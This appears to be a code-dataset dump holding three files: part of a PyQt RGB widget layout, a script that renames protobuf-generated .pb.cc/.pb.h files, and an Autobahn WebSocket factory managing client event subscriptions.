        # vertical layout for the ComboBox and SpinBox
        uklad = QVBoxLayout()
        uklad.addWidget(self.listaRGB)
        uklad.addWidget(self.spinRGB)
        # add the ComboBox/SpinBox layout to the Radio group's horizontal layout
        ukladH3.insertSpacing(1, 25)
        ukladH3.addLayout(uklad)
        # end ComboBox and SpinBox ###
        # PushButton buttons ###
        uklad = QHBoxLayout()
        self.grupaP = QButtonGroup()
        # non-exclusive: several channel buttons may be pressed at once
        self.grupaP.setExclusive(False)
        for v in ('R', 'G', 'B'):
            self.btn = QPushButton(v)
            self.btn.setCheckable(True)
            self.grupaP.addButton(self.btn)
            uklad.addWidget(self.btn)
        # group the buttons
        self.grupaPBtn = QGroupBox('Przyciski RGB')
        self.grupaPBtn.setLayout(uklad)
        self.grupaPBtn.setObjectName('Push')
        self.grupaPBtn.setCheckable(True)
        self.grupaPBtn.setChecked(False)
        # end PushButton ###
        # main window layout, vertical ###
        ukladOkna = QVBoxLayout()
        ukladOkna.addLayout(ukladH1)
        ukladOkna.addWidget(ukladH2)
        ukladOkna.addLayout(ukladH3)
        ukladOkna.addWidget(self.grupaPBtn)
        self.setLayout(ukladOkna)  # assign the layout to the main window
        self.setWindowTitle('Widżety')
241f32c80eb32955dc5e73fb9b33f38fc9dde4e4 | 552 | py | Python | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | tools/rename.py | xta0/Python-Playground | 513ebd2ad7f0a8c69f2f04b4f7524b31e76fa5bc | [
"MIT"
] | null | null | null | import os
import sys
walk_dir = sys.argv[1]
for root, subdirs, files in os.walk(walk_dir):
for filename in files:
if filename.endswith((".pb.cc", ".pb.h")):
filepath = os.path.join(root,filename)
name = filename.split('.')[0]
print(name)
newName = ""
if filename.endswith(".cc"):
newName = name+".cc"
else:
newName = name+".h"
newFilePath = os.path.join(root, newName)
os.rename(filepath, newFilePath)
| 29.052632 | 53 | 0.512681 |
46c52454498ad961f6cbfb3b8893135ca5f97378 | 4,075 | py | Python | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | null | null | null | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | 21 | 2018-05-14T15:32:42.000Z | 2018-07-22T06:36:38.000Z | neuron/factory.py | tomforge/Neuron | 21278d125c9c507319ea01366eb44e46646e0926 | [
"Apache-2.0"
] | null | null | null | import logging
logger = logging.getLogger("server")
from autobahn.twisted.websocket import WebSocketServerFactory
from neuron import utils
class WSManagerFactory(WebSocketServerFactory):
"""
Manages all websocket clients and connections. All
interactions with clients should be made through this class.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# A map of connected clients' addresses to their protocol instances
self.clients = {}
# A map of subscribers to their set of subscribed events
self.subscribers = {}
# A map of events to their set of subscribers
self.eventSubscriptions = {}
def registerClient(self, client):
self.clients[client.peer] = client
def unregisterClient(self, client):
try:
self.clients.pop(client.peer)
except KeyError:
logger.error(
"Unregistering a client that was never registered: {}".format(client.peer))
def addSubscription(self, subscriber, event):
"""
Subscribe the given subscriber to the given event.
Whenever the given event is received, the subscriber
will be notified via the notify() function
"""
if subscriber not in self.subscribers:
self.subscribers[subscriber] = {event}
else:
self.subscribers[subscriber].add(event)
if event not in self.eventSubscriptions:
self.eventSubscriptions[event] = {subscriber}
else:
self.eventSubscriptions[event].add(subscriber)
def removeSubscription(self, subscriber, event=None):
"""
Stop notifying the given subscriber about the given event.
If event is None, remove subscriber from all events.
"""
try:
if event is None:
events = self.subscribers.pop(subscriber)
for event in events:
self.eventSubscriptions[event].remove(subscriber)
if not self.eventSubscriptions[event]:
self.eventSubscriptions.pop(event)
else:
self.subscribers[subscriber].remove(event)
if not self.subscribers[subscriber]:
self.subscribers.pop(subscriber)
self.eventSubscriptions[event].remove(subscriber)
if not self.eventSubscriptions[event]:
self.eventSubscriptions.pop(event)
except KeyError:
logger.error("Trying to remove non-existing subscription of "
+ str(subscriber)
+ ("" if event is None else " to " + str(event)))
def dispatchToSubscribers(self, event, data, sender):
"""
This is the main router function for client side events. All
client events will be handled here and dispatched to
backend subscribers.
Raises:
KeyError: If event is not in events list
"""
try:
for subscriber in self.eventSubscriptions[event]:
try:
subscriber.notify(event, data, sender.peer)
except (AttributeError, TypeError) as e:
logger.error(str(e))
except KeyError:
logger.warning("Received unsubscribed event " + str(event)
+ " from " + sender.peer)
def triggerEvent(self, event, data, addr=None):
"""
Sends an event to the client of the given address. If
not address is given, the event is broadcasted to all clients
"""
payload = utils.construct_event_json(event, data)
logger.debug(payload)
if addr is None:
for _, client in self.clients.items():
client.sendMessage(payload, isBinary = False)
elif addr in self.clients:
self.clients[addr].sendMessage(payload, isBinary=False)
else:
logger.error("Client {} disconnected. Message not sent".format(addr))
| 39.95098 | 91 | 0.600491 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.